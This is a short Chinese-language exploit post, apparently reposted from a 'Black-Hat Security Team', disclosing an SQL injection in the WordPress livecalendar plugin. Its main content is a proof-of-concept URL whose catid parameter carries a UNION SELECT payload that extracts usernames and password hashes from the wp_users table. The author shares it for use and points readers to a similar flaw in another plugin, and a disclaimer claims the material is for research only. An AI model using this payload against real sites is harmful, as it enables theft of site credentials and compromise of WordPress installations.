/****************************************************
* Wordpress plugin livecalendar SQL injection
* From WwW.bhst.OrG Black-Hat Security Team
* Author LengF Contact:81sec.com
****************************************************/
漏洞文件:
wp-content/plugins/livecalendar/kcalendar.php
POC:
http://hackit.com/wp-content/plu ... th=10&catid=-1/**/union/**/select/**/user_login,user_pass/**/from wp_users/*
这个injection比较低级,不过这个插件貌似网上很难找到。分享给大家,兴许没太大作用,当然了wordpress一般只能从插件入手了。另外还有一个插件count-per-day也存在类似的注入。有时候wordpress注入还是比较鸡肋的,因为经常密码破解不出来,当然了,权限够大另当别论了。
本文没啥分析的,呵呵
by LengF
文章来源于lcx.cc:Wordpress plugin livecalendar SQL injection
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论